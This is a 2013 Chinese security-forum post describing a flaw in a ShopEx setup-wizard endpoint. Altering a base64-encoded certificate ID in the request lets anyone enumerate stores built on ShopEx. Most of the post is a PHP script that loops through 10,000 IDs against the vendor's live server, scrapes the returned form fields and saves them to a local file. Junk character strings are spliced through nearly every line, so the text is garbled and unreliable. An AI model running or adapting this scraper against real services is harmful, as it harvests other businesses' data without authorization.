中国网络渗透测试联盟

标题: ShopEx某接口缺陷可遍历所有用户网站 [打印本页]
作者: admin    时间: 2013-9-21 15:59
标题: ShopEx某接口缺陷可遍历所有用户网站
简要描述:
2 u8 {3 n% p1 VShopEx某接口缺陷,可遍历所有网站0 `3 _6 W& D' N
详细说明:
' Q0 z+ y5 k' Z; y3 [: [( M问题出现在shopex 网店使用向导页面 2 f( ], c) Q. U; d
1 {2 k) q1 x  |! T: e' ^$ {

- m8 I0 t9 f. o- q; p* q- m
0 ?# X- u# }; Chttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=  }! P, H; ?/ }- u

8 R  I7 K/ ~4 j, f/ _3 N- }, s
( n( T0 W- c* b3 J& B/ K. y0 g- e0 d& w0 ^
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}7 ~* R- K) b& D

/ v) y, _7 _0 T+ I: V7 z; S  s- ~! O, c$ A* G
4 n0 k5 ]+ R) _- p1 g# q/ k# B
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
( h' }' s- y' b9 l* ]4 Q" q0 f, n4 W8 }& H! {' J$ k, L
% |3 a1 G# a  I3 n9 c

' @" v; T/ T3 Z( R<?php# K8 n  I/ R- ^  S* e
) e5 z/ G* u6 A
                for ($i=1; $i < 10000; $i++) { //遍历
6 K* {' l" y' u" _5 i) S4 D, p
                        ShowshopExD($i);
* [- z: k/ m: _: g9 o3 b: ^/ y! t  V) m9 @% J  E9 J9 r  S
                }' G) g0 p1 F7 Y) y. P5 w

( r) e6 [8 A5 T/ ~' u& s) @                function ShowshopExD($cid) {
$ i1 F$ L3 ~7 d) x* Z- r) J( N+ f5 g
                $url='http://guide.ecos.shopex.cn/step2.php';# a/ S" F! k  Q2 p
- A0 h$ O8 Y! ?/ B9 j
                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
( e" P2 N# x; `$ p3 t4 a- X. Z
# |: H0 @3 o+ Q# ]$ s' s! F$ F        $url = $url.'?refer='.$refer;
. T1 p6 @3 |, H, p9 b* b
6 o6 g6 S0 V6 Y; j        $ch = curl_init($url);4 Y+ a2 j1 P' y$ ^3 w

0 n8 N/ g! l( ?- s& i        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;8 n5 ]7 d8 s5 R) |" w9 D) J* C

: Z1 @# Q1 u* \6 x9 s        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
' A  |7 ]) B$ L7 o3 f" @* g
: B" a  p5 t9 ~1 R        $result = curl_exec($ch);
1 J9 B' e, X: s6 B  A& T1 U; G6 Y! ?' H
        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
0 C7 b' O4 Z' ^9 l, f
1 K9 n$ ~: M6 j! x- Y; G        if(strpos($result,$refer))
! p: k& g4 N: u. c( i5 V1 \5 h
( @% E# a' T$ V* m1 ^6 @& t        {
* V. v& t" S9 J) K& ?, P- b6 t% ^, y
                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
% r/ s* H2 a7 i( J- t0 u0 T9 {5 c' V. B2 O
                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);8 o. w6 v$ |; Y! o% @# m

6 K' K; p& T) a( Y# D" w3 N                foreach ($value[1] as $key) {
. w8 e- A3 F1 j* X9 w8 x& y* z( o+ I( L8 o: d* c, a, Y, Y
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
" }" m) t4 p* U) W4 D' W6 w4 E& F0 R
                        echo $res[1][0].':'.$res[3][0]."\r\n";
) c& W9 ^* P& [7 D$ A( D/ U6 G; O: {+ q8 H  A
                        $col =$res[1][0].':'.$res[3][0]."\r\n";
$ z5 {% \$ x2 L% \6 s1 w, @6 [$ m6 O/ w' E
                        fwrite($fp, $col, strlen($col));
9 S# a3 y! u1 m0 {' S9 V- R6 n/ _
                }/ f$ N( @3 H2 k& n0 }8 j# X- G

: L3 `3 c4 f! E, Y8 L  P                echo '--------------------------------'."\r\n";4 V9 N5 ]; M  t3 G0 Z. _( R
7 p# v7 t, d0 g- q* ?) j
                fclose($fp);
6 i' T: F/ o3 X4 r6 B% N2 v6 x. V& R! I# w( e; m
        }* o  P# y2 v2 n

3 ?/ o) Y! O. @' U9 h. n. [6 e: Z        flush();
* [& M+ ^2 c% z2 H) ]  v* B- D, Y/ h7 V1 |# `( K1 X
        curl_close($ch);2 W1 {, Q. L& c+ R* K0 S$ |

  i6 N  X3 {3 i1 U+ ~% T. A9 p                }
1 Z* y$ T" X) K% Z# [7 O$ m( u1 W% \$ R5 |9 C1 t) x: B) f: _
?>- L) r! e5 F! ]+ F: z; `
漏洞证明:4 }  H) k8 u. r* {
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg( U6 f; |! \/ L# |8 m' G, O
refer换成其他加密方式, Y9 ^5 @  e. I* F8 M# K4 Y




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2